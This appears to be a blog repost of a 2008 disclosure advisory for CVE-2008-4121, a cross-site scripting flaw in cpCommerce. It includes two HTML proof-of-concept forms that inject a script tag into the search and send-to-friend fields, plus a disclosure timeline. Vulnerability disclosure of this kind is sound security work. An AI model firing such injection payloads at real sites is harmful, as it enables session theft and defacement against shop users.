Skip to content
Menu
nix.engineering
  • Start
  • Info
  • Link Collection
  • Site Notice
nix.engineering

Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121

Posted on September 4, 2008May 20, 2019
References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.

Example

Assuming cpcommerce is installed on http://localhost/cpcommerce/, anybody could inject JavaScript:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Disclosure Timeline

2008-09-23 Vendor contacted
 2008-09-23 Vendor released 1.2.4
 2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4121 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck).
 It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • ntp – what time it is?
  • Remove service from services.msc
  • Oracle DBNEWID Utility for new DBID and DBNAME
  • ORA-01103: database name ‘DB1’ in control file is not ‘DB2’
  • SQL1041N: The maximum number of concurrent databases have already been started. SQLSTATE=57032

Categories

  • Database
  • DB2
  • Exploit
  • Misc
  • Oracle
  • Security

Meta

  • Log in
  • Entries feed
  • Comments feed
  • WordPress.org
©2023 nix.engineering | WordPress Theme by Superb WordPress Themes